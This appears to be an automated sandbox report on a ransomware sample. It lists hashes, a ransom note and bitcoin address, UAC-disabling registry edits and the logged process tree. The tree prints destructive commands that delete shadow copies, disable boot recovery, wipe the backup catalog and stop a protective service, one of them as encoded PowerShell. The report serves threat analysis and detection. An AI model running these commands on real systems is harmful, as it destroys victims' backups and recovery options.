Overview
overview
10Static
static
10020db58e3c...4c.exe
windows10-2004-x64
1006cbef0e90...f8.exe
windows10-2004-x64
9083c5b43df...fb.exe
windows10-2004-x64
1015cb04fa5c...4f.exe
windows10-2004-x64
922a1f50db9...85.exe
windows10-2004-x64
924cb5e44b6...8d.exe
windows10-2004-x64
1027c9f44e0c...d6.exe
windows10-2004-x64
102c2aa8458f...3d.exe
windows10-2004-x64
72e9e18954a...d1.exe
windows10-2004-x64
102ebb2a34dd...c6.exe
windows10-2004-x64
102fff52aa0c...21.exe
windows10-2004-x64
1037ca1cfa1f...60.exe
windows10-2004-x64
1038cd67a044...4c.exe
windows10-2004-x64
93d4f84e20d...96.exe
windows10-2004-x64
49cff73125...4b.exe
windows10-2004-x64
104c0153b979...a5.exe
windows10-2004-x64
104ded976d2e...5a.exe
windows10-2004-x64
104ee95ee627...68.exe
windows10-2004-x64
105b439daac4...d7.exe
windows10-2004-x64
1067df6d4554...78.exe
windows10-2004-x64
36b3bf710cf...2e.exe
windows10-2004-x64
76df64a0a92...fe.exe
windows10-2004-x64
1075b45fea60...34.exe
windows10-2004-x64
1082e6b71b99...5a.exe
windows10-2004-x64
108a6aa9e5d5...47.exe
windows10-2004-x64
8bcfb60733...fd.exe
windows10-2004-x64
108bf1319fd0...6c.exe
windows10-2004-x64
108d76a9a577...20.exe
windows10-2004-x64
108dd283ca01...4c.exe
windows10-2004-x64
108edaee2550...e7.exe
windows10-2004-x64
109bff71afad...75.exe
windows10-2004-x64
109d7fb7050c...20.exe
windows10-2004-x64
10Resubmissions
13-07-2024 09:54
240713-lxbx6swdmm 1013-07-2024 09:50
240713-lvbvdsyapd 1013-07-2024 09:46
240713-lr1dksyajd 10Analysis
-
max time kernel
1678s -
max time network
1145s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
13-07-2024 09:54
Static task
static1
Behavioral task
behavioral1
Sample
020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral2
Sample
06cbef0e9051e2f54cf17e0d191f890d82cfec91bbc3e5bc429a2f364fd925f8.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral3
Sample
083c5b43df8bee2a6235c3f5038cc9860b4a4bfd1675d367a67fcfff93ccfcfb.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral4
Sample
15cb04fa5c58299e320c833b62a6e44ec67423aed9fcc969d5b90f4380ccf24f.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral5
Sample
22a1f50db97e2f91417a668d7c31379012b9f756d37a6697220b10aaf1f8b585.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral6
Sample
24cb5e44b68c9dd2a115de3415ee96e78d2180dfd287133c54dfa29c90c1088d.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral7
Sample
27c9f44e0c5de68792b684355a68ad83eba89cbe46cc9cf3a6efeb448c9f39d6.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral8
Sample
2c2aa8458f3d138a2cfaa38b2da75b541ccdad655b5db374733e4cecfb24833d.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral9
Sample
2e9e18954a73762ae06eaa6fa85c4dbdabf607fee4ec2ed016a689c7173dbfd1.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral10
Sample
2ebb2a34dd6633e785f67d118a8c778969e4e34d667cf554268997e13920a1c6.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral11
Sample
2fff52aa0c2fac4e53008cdf0bbea4ade2243bf42418330a03d5ce6f0d598421.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral12
Sample
37ca1cfa1f30b57408d3e855f98f9e5fd6900b23643bbc0c6163a875edf00b60.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral13
Sample
38cd67a044a7da3eea806129a3ae9616cfbe1f49a68997ac932e5214b1719f4c.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral14
Sample
3d4f84e20d5cf317edcefcc98bdd7e126078b25cdc56b816edbec532a8763096.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral15
Sample
49cff73125bdbed98cdda85572228372cecaedc8fa98fd48706fd23e6ad1ad4b.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral16
Sample
4c0153b979e65346c1d6f863086082ec5ef103cbf6b0f5e8652d61da678a8ca5.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral17
Sample
4ded976d2e5474b5ce1562ceb032981e23f170e7d6ec07fadd131aea82715a5a.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral18
Sample
4ee95ee6271482c7939ce3b9db210ffb7a73ceebb6500b978fa3e6fe1d6ea168.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral19
Sample
5b439daac4faa9078a6973301eaeed339f77bbbbcdaa46f3452c1fc90499a4d7.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral20
Sample
67df6d4554cb4c82c8f41d8257174c8c39059cd386744fc0f36ef84faede1478.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral21
Sample
6b3bf710cf4a0806b2c5eaa26d2d91ca57575248ff0298f6dee7180456f37d2e.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral22
Sample
6df64a0a921bd65006968d7eb146f7ceb60ffc1345575d39edec0eded41eb4fe.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral23
Sample
75b45fea6000b6cb5e88b786e164c777c410e11fdcf1ff99b66b43096223d734.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral24
Sample
82e6b71b99a6ec602cfbdc00e0bbaf34c719d7b6879b6e384004886d491ad45a.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral25
Sample
8a6aa9e5d58784428d0b1641e99f024438b20747993039e16b8d262f3f5fd347.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral26
Sample
8bcfb607330063b60948c0520fe2ccbce3562a9cc43a55ea45f16878fc6a9bfd.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral27
Sample
8bf1319fd0f77cd38f85d436e044f2d9e93e3f33844f20737117230b73b60f6c.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral28
Sample
8d76a9a577ea5ad52555a2824db6f5872548fe4bcc47d476cae57603386c4720.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral29
Sample
8dd283ca012e7a70a2673d2cc211c6a616ff23bc5bd3599a1da077ba946a044c.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral30
Sample
8edaee2550dde9df1fe2e8c26965be3817f0d66ba13510ac281bfdc8dde1dde7.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral31
Sample
9bff71afadddb02956bd74c517b4de581885b0d6ff007796d00d3c2190c30275.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral32
Sample
9d7fb7050cf315639502f812d25d49c19b14c93948827484c2514bbc87261920.exe
Resource
win10v2004-20240709-en
General
-
Target
020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe
-
Size
1.3MB
-
MD5
ffce3f25a125b5dfcd96e92148b7d209
-
SHA1
a4c2bfa23b98471ac1ea7103e194cf6488a058ac
-
SHA256
020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c
-
SHA512
7d0af9214e4cdabceab9abb2586288e0a42ef9b7a7abc1bc7f03c04cf48b6722eeeee4a476aaf2567feaacbc70fb3e6bf36aa1050b010ef68019b7e80886f823
-
SSDEEP
24576:1pa1z++i/OfNbXirk1nF1qfWk3w80geAcVW9CFnBOmp7BCr/otH5LSp+7I80w:zF+BZk6FnBOmp7BCr/G7I80
Malware Config
Extracted
C:\Users\Admin\Documents\How Do I Recover My Files (Readme).txt
3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "5" 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "3" 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "1" 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (174) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\host 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2484 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 3028 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe 3028 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe 3028 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe 3028 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe 3028 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe 3028 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe 3028 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe 3028 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe 5060 powershell.exe 5060 powershell.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2364 WMIC.exe Token: SeSecurityPrivilege 2364 WMIC.exe Token: SeTakeOwnershipPrivilege 2364 WMIC.exe Token: SeLoadDriverPrivilege 2364 WMIC.exe Token: SeSystemProfilePrivilege 2364 WMIC.exe Token: SeSystemtimePrivilege 2364 WMIC.exe Token: SeProfSingleProcessPrivilege 2364 WMIC.exe Token: SeIncBasePriorityPrivilege 2364 WMIC.exe Token: SeCreatePagefilePrivilege 2364 WMIC.exe Token: SeBackupPrivilege 2364 WMIC.exe Token: SeRestorePrivilege 2364 WMIC.exe Token: SeShutdownPrivilege 2364 WMIC.exe Token: SeDebugPrivilege 2364 WMIC.exe Token: SeSystemEnvironmentPrivilege 2364 WMIC.exe Token: SeRemoteShutdownPrivilege 2364 WMIC.exe Token: SeUndockPrivilege 2364 WMIC.exe Token: SeManageVolumePrivilege 2364 WMIC.exe Token: 33 2364 WMIC.exe Token: 34 2364 WMIC.exe Token: 35 2364 WMIC.exe Token: 36 2364 WMIC.exe Token: SeDebugPrivilege 5060 powershell.exe Token: SeIncreaseQuotaPrivilege 2364 WMIC.exe Token: SeSecurityPrivilege 2364 WMIC.exe Token: SeTakeOwnershipPrivilege 2364 WMIC.exe Token: SeLoadDriverPrivilege 2364 WMIC.exe Token: SeSystemProfilePrivilege 2364 WMIC.exe Token: SeSystemtimePrivilege 2364 WMIC.exe Token: SeProfSingleProcessPrivilege 2364 WMIC.exe Token: SeIncBasePriorityPrivilege 2364 WMIC.exe Token: SeCreatePagefilePrivilege 2364 WMIC.exe Token: SeBackupPrivilege 2364 WMIC.exe Token: SeRestorePrivilege 2364 WMIC.exe Token: SeShutdownPrivilege 2364 WMIC.exe Token: SeDebugPrivilege 2364 WMIC.exe Token: SeSystemEnvironmentPrivilege 2364 WMIC.exe Token: SeRemoteShutdownPrivilege 2364 WMIC.exe Token: SeUndockPrivilege 2364 WMIC.exe Token: SeManageVolumePrivilege 2364 WMIC.exe Token: 33 2364 WMIC.exe Token: 34 2364 WMIC.exe Token: 35 2364 WMIC.exe Token: 36 2364 WMIC.exe Token: SeBackupPrivilege 3928 vssvc.exe Token: SeRestorePrivilege 3928 vssvc.exe Token: SeAuditPrivilege 3928 vssvc.exe Token: SeBackupPrivilege 4856 vssvc.exe Token: SeRestorePrivilege 4856 vssvc.exe Token: SeAuditPrivilege 4856 vssvc.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 3028 wrote to memory of 3116 3028 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe 86 PID 3028 wrote to memory of 3116 3028 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe 86 PID 3028 wrote to memory of 3116 3028 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe 86 PID 3028 wrote to memory of 728 3028 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe 87 PID 3028 wrote to memory of 728 3028 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe 87 PID 3028 wrote to memory of 728 3028 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe 87 PID 3028 wrote to memory of 5060 3028 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe 90 PID 3028 wrote to memory of 5060 3028 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe 90 PID 3028 wrote to memory of 5060 3028 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe 90 PID 3116 wrote to memory of 2484 3116 cmd.exe 92 PID 3116 wrote to memory of 2484 3116 cmd.exe 92 PID 3116 wrote to memory of 2484 3116 cmd.exe 92 PID 728 wrote to memory of 2364 728 cmd.exe 93 PID 728 wrote to memory of 2364 728 cmd.exe 93 PID 728 wrote to memory of 2364 728 cmd.exe 93 PID 3028 wrote to memory of 2004 3028 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe 96 PID 3028 wrote to memory of 2004 3028 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe 96 PID 3028 wrote to memory of 2004 3028 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe 96 -
System policy modification 1 TTPs 17 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "1" 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "5" 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "1" 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "3" 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\dontdisplaylastusername = "0" 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "1" 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\scforceoption = "0" 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\undockwithoutlogon = "1" 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures = "0" 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "5" 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0" 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "1" 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "1" 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext 020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe"C:\Users\Admin\AppData\Local\Temp\020db58e3c552ead23b18bb04bb75781e51347dab4868d1fc55e2854a6647d4c.exe"1⤵
- UAC bypass
- Drops file in Drivers directory
- Checks computer location settings
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3028 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C sc config "AppCheck" start=disabled2⤵
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\SysWOW64\sc.exesc config "AppCheck" start=disabled3⤵
- Launches sc.exe
PID:2484
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet2⤵
- Suspicious use of WriteProcessMemory
PID:728 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5060
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\How Do I Recover My Files (Readme).txt2⤵PID:2004
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3928
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4856
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5KB
MD59886cc330dd14cd396747d25e2da3eea
SHA13d8c34784eac9fad6e76eb3f5eb33ae86530f062
SHA256fd92fa855e45466bed2712c79c1e81b5ecb494f92a1c3e37f8230cf7efa4e31a
SHA512e2d47e4c0c17077f384e1aaed92c50d6331dccde4a5b6b1be5d3e420572d1a86c8a7a62c53accf779a8c9822a1a12d7f57425c30f320cdcd759b0f70e4aa04b6